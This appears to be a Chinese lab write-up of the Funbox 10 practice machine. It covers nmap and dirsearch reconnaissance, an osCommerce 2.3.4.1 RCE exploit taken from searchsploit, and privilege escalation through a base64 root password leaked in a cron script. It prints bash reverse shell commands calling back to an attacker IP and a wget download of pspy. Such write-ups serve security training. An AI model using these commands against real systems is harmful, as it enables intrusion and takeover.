Funbox 10 靶机wp

本文详细记录了对Funbox 10靶机进行的渗透测试过程,包括主机探活、端口发现、80端口的 nikto 扫描和目录扫描,发现了CMS存在漏洞并尝试RCE攻击,最终通过解密密文和利用脚本成功提权至root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

主机探活

nmap -sP 192.158.159.0/24

目标靶机IP:192.168.159.161


端口发现

nmap -sV -p- -A 192.168.159.161

在这里插入图片描述

开放了 22、25、80、110、143


80端口

nikto
nikto -h 192.168.159.161

在这里插入图片描述

没有有用信息


目录扫描
dirsearch -u 192.168.159.161

在这里插入图片描述


访问扫描出来的这些目录,发现 catalog 目录下是一个cms

在这里插入图片描述


CMS

本地漏洞库搜索一下现有漏洞

searchsploit oscommerce 2.3.4.1

在这里插入图片描述

存在漏洞!


直接尝试 RCE 的漏洞能否利用

searchsploit -m 44374.py	# 复制到当前目录

修改脚本文件

在这里插入图片描述


python 44374	# 执行

在这里插入图片描述


成功执行,查看结果

在这里插入图片描述


再次修改脚本文件,将命令改一下,反弹shell

在这里插入图片描述

bash -i >& /dev/tcp/192.168.159.131/7777 0>&2

在这里插入图片描述


本地开启监听

nc -nlvp 7777

失败了,没有反弹回来

原因:bash -i 的方法返回 shell 必须在bash的窗口中使用,直接在 php 文件中利用system函数调用是无效的!!!

正确方法应该是先用 php 调起 bash 环境,再反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.159.131/7777 0>&2'

注意单双引号 和 转义字符


成功反弹shell!

在这里插入图片描述


提权

setuid
find / -perm -u=s -type f 2>/dev/null

没有可疑文件。。。(之后这些之前靶机都有的且无收获我都不放图了)


sudo
sudo -l

无收获


计划任务
crontab -l
cat /etc/crontab

无收获


信息收集

没找到啥有用的信息


脚本检测

网上自己搜,pspy脚本,有很多

python -m SimpleHTTPServer 80	# 本机开服务,准备下载
wget 192.168.159.131/pspy64		# 靶机下载
chmod +x pspy64					# 给执行权限
./pspy64						# 运行

在这里插入图片描述

一直在执行 cron.sh的一个计划任务,看看这个脚本执行了个啥(虽然不是 root 运行的,但基本就他在一直跑,没办法。。。)


在这里插入图片描述

发现有个大概base64加密的密文:LXUgcm9vdCAtcCByZnZiZ3QhIQ==


解个码

在这里插入图片描述

用户:root

密码:rfvbgt!!


su
su	# 直接切 root 用户

在这里插入图片描述


换种交互方式

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述


成功获取 root 权限!!!

在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值